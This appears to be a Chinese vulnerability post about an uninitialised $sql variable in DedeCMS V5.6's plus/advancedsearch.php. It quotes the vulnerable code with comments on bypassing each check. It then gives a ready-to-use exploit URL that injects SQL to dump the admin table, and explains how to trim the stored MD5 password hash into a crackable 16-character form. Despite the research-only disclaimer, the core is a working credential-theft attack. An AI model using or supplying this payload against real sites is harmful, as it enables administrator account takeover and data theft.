DedeCms V5.6漏洞 变量未初始化 导致鸡助漏洞
漏洞描述: <br />健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。高效率标签缓存机制:允许对类同的标签进行缓存,在生成 HTML的时候,有利于提高系统反应速度,降低系统消耗的资源。模型与模块概念并存:在模型不能满足用户所有需求的情况下,DedeCMS推出一些互动的模块对系统进行补充,尽量满足用户的需求。 <br /><br />plus/advancedsearch.php <br />$sql 变量未初始化。导致鸡助漏洞 <br /><br><div class="msgheader"><div class="right"><span style="CURSOR: pointer" class="copybut"><u>复制代码</u></span></div>代码如下:</div><div class="msgborder" id="phpcode13"> <br />if($mid == 0) //必须绕过。 <br />{ <br />showmsg('参数不正确,高级自定义搜索必须指定模型id', 'javascript'); <br />exit(); <br />} <br />$query = "select maintable, mainfields, addontable, addonfields, template from dede_advancedsearch where mid='$mid'"; <br />$searchinfo = $dsql->GetOne($query); <br />if(!is_array($searchinfo)) //囧啊,绕过有难度。 <br />{ <br />showmsg('自定义搜索模型不存在','-1'); exit(); <br />} <br />$template = $searchinfo['template'] != '' ? $searchinfo['template'] : 'advancedsearch.htm'; <br />if(empty($sql)) //人品问题,成功绕过!{ <br />.............. <br />}else{ <br />$sql = urldecode($sql); <br />$query = $sql; <br />} <br />$sql = urlencode($sql); <br />$dlist = new DataListCP(); <br />$dlist->pageSize = 20; <br />$dlist->SetParameter("sql", $sql); <br />$dlist->SetParameter("mid", $mid); <br />............... <br />$dlist->SetTemplate($templatefile); <br />$dlist->SetSource($query); <br />.............<*参考 <br />*> <br /></div><br />测试方法: <br /><br />本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! <br />plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` <br /><br />密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
頁:
[1]